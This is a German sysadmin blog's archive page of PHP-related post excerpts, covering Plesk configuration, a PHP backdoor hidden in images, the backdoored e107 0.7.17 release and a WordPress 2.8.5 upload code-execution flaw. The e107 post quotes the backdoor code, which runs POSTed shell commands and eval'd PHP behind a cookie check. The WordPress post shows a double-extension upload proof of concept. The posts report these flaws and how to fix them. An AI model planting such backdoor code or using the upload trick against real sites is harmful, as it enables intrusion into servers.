Archiv

Artikel Tagged ‘php’

PHP Code/Backdoors in Bildateien verstecken *update*

17. Oktober 2012 2 Kommentare

Im Zuge meiner Taetigkeit bin ich auf eine neue Art gestossen einen Hack zu verbergen bzw durchzufuehren, der Erfolg des Hacks haengt jedoch von einigen Faktoren ab, ist jedoch sicherlich ein denkbares Szenario und gerade fuer den Fall einer forensischen Untersuchung eine Moeglichkeit die man im Kopf behalten sollte.
Durch folgende Umstaende kam es zu einem Hack, eine Uploadfunktion welche das Hochladen von Datein erlaubte, eine Debian Installation mit mangelhaft gesetzten Einstellungen fuer das Ausfuehren PHP Scripten, schlechte PHP.INI, ohne die passenden Excludes fuer exec und Co.

Die Debian Config welche ich meine sieht folgendermassen aus: Mehr…

Plesk mit multiplen PHP Versionen als fastcgi

1. Dezember 2011 Keine Kommentare

In Plesk kann standardmäßig nicht zwischen verschiedenen PHP-Versionen geswitcht werden. Falls die Kunden oder User aber mit der alten 5.2er oder der standard-Version ohne einem bestimmten Modul etc. nicht zufrieden sind, kann man das folgendermaßen lösen:

1. aktuelle PHP-Version von Hand kompilieren und mit prefix Pfaden installiert
2. php-cgi aus dem Prefix-Pfad des kompilierten PHPs aus /bin nach /usr/bin kopieren (anders nennen z.B. php53-cgi) Mehr…

Plesk, php-cgi und eigene php.ini

Da wir viele Kunden haben, welche Plesk im Einsatz haben und immer mehr auf php-cgi setzen war die Suche gross nach einer Moeglichkeit fuer diese Kunden auch passend eigene php.ini Files zu setzen, nach etwas Suche wurde das passende gefunden, stammt nicht aus meiner Feder:

Wir nutzen folgenden Wrapper (cgi_wrapper), ggf. die PHPRC anpassen, diese wird fuer User genutzt die keine eigene php.ini haben sollten:

#!/bin/sh

domain=`fgrep -m 1 "$UID" /etc/passwd| awk -F\: '{print $6}' |awk -F"/" '{print $5}'`
PHPRC=/var/www/vhosts/$domain/conf/php.ini Mehr...

e107.org cracked, backdoored und nun gefixed?

27. Januar 2010 Keine Kommentare

Mit einer zeitlich zurueckdatierten News meldet sich McFly vom e107 Developer Team und raeumt ein, dass e107.org gecracked wurde und auch das die Version 0.7.17 von einer Backdoor betroffen war, auch wenn der eigentliche Source nie kompromittiert worden ist, wurde hier fuer kurze Zeit eine Version zum Download angeboten welche die Backdoor enthalten hatte.
McFly raeumt auch ein, dass sie sich wohl zu lange Zeit genommen hatten, die Luecke zu patchen, das laesst auf weiteres schliessen, wie Beispielsweise laengere Kenntnis von der Sicherheitsluecke.
Einzelheiten zum Crack oder auch welche Seiten von e107 wie veraendert wurden verschweigt der Entwickler, nicht gerade das was man erwarten oder vielmehr hoffen wuerde, hier muessen Mailinglisten, Blogs und Co fuer Aufklaerung sorgen – wirklich schade.
Der Entwickler hofft nun alle schaedlichen Files entfernt zu haben und alle Spuren des Einbruchs entfernt zu haben.

Wer sich nun fragt wieso ich mich gerade an der Geschichte 3 Posts lang aufhaenge, ist es doch nur ein Beispiel von vielen!? Ja soweit richtig, jedoch war mir einfach danach.

e107.org Backdoor: The story continues

26. Januar 2010 Keine Kommentare

Nachdem hier bereits gestern von einer etwaigen Backdoor in e107 in der Version 0.7.17 berichtet wurde, geht die Geschichte nun weiter.
Scheinbar wurde diese stillschweigend aus den Sourcen entfernt und eine neue Version hochgeladen welche die Backdoor nicht enthaelt und neue Versionen der class2.php aufweist, scheinbar wurde hier in 3 Schritten gepatched, denn die aktuelle Version 0.7.17 unterscheidet sich von der die ich gestern testen konnte, jedoch war die Version die ich in den Haenden halten konnte, nicht die Version, welche das FD Posting enthalten hat.
Nun geht es weiter auf: http://e107.org/news.php finden sich ueber dem Documenttype Javascripts die dort wohl nicht sein sollten in der Form: <a href=’/wiki/docs/html/.store/[Spamtext]-[Number].php‘>spamtext</a>

Andere User berichten von ihren Virenscannern mit Meldungen wie „Virus/Spyware Mal/ObfJS-CB!“
Auch sind weitere Seiten nicht nur die News Seite betroffen.

Von den e107 Entwicklern bisher noch kein Statemen, die Webseite ist nach wie vor online, statt diese offline zu nehmen und etwaige Einbruchsspuren zu entfernen, wird hier im Hintergrund nur leise gefixed?

Update: Ich habe gerade ein Gespraech mit einem e107.org Developer gehabt, hier heisst es: Ja die Luecke ist bekannt, wir haben sie gefixed, was erwartest Du mehr? MS machts nicht besser. Das es sich hierbei um einen Silentpatch handelt interessiert wohl kaum, schliesslich machen andere auch Scheisse, wieso nicht auch im eigenen Laden.
Das nenn ich mal eine Aussage!

e107 Version 0.7.17 Backdoored?

25. Januar 2010 Keine Kommentare

Laut der ML FullDisclosure hat sich angeblich im CM-System e107 in der aktuellen Version 0.7.17 eine Backdoor eingeschlichen oder/bzw der Server wurde kompromittiert und die Sourcen wurden veraendert.

Das Team rund um e107 wurde informiert jedoch liegen noch keine offiziellen Angaben hierzu vor.
Die Backdoor befindet sich angeblich in: class2.php Line: 1876
hier soll folgender Code zu finden sein:
if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

...

if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}

Zu finden waere bei mir die md5 Zeile jedoch in Zeile 1874, den Rest kann ich nicht finden, warten wirs ab.

KategorienOpensource, Security Tags: , , , ,

PHP Security Poster von SektionEins

21. November 2009 Keine Kommentare

Ein t4c muss ja auch Samstags mal dran und etwas erfreuliches hatte das ganze, ich habe Post von SektionEins bekommen, wer SektionEins nicht kennt, kennt evtl. den Suhosin (ehemals hardened-PHP) Entwickler Stefan Esser.
Da ich schon sehr lange Suhosin einsetze war es klar, das Poster will ich haben und nun habe ich es auf meinem Schreibtisch liegen, sieht klasse aus und wird sicherlich auch seinen Zweck erfuellen wenn ich nicht programmiere, aber der Blick unserer Entwickler ist jetzt schon garantiert und wahrscheinlich wird der ein oder andere danach gleich seine Scripte ueberpruefen, auch wenn diese nicht von Aussen zu erreichen sind auch werden sicherlich einige ihre eigenen Kisten auf Suhosin und dessen Config pruefen.

Klasse Freebie!
Danke Stefan!

WordPress <= 2.8.5 Arbitrary PHP Code Execution

12. November 2009 Keine Kommentare

Dawid Golunski hat eine Sicherheitsluecke zu WordPress <= 2.8.5 herausgegeben mit der es als normaler Uploadberechtigter User moeglich sein soll, Schadhaften Content hochzuladen und danach auzufuehren.
Hier zu benoetigt man lediglich einen Browser und koennte ein File wie folgendes erstellen und hochladen:

test-image.php.jpg

Welches folgenden Code enthaelt:

<?php phpinfo(); ?>

Danach kann das File via http://link-to-our-wp-unsecured-blog.com/wp-content/uploads/2009/11/test-vuln.php.jpg aufgerufen werden und sollte die phpinfo Ausgabe anzeigen.

Als Workaround mittels Apache empfiehlt der Autor ein .htaccess File im Uploadverzeichnis von WordPress (wordpress/wp-content/uploads) mit folgendem Content:

deny from all

order deny,allow
allow from all

Bei einem Versuch mit Lighttpd und PHP 5.2.11-pl0-gentoo with Suhosin-Patch 0.9.7 wurde jedoch nicht das gewuenschte Ergebnis gezeigt.

Edit#0: Der Exploit funktioniert nur auf Apache und mit aktiviertem +Multiviews
Edit#1: WordPress 2.8.6 fixed 2 Sicherheitsluecken, die hier beschriebene und eine XSS Schwachstelle.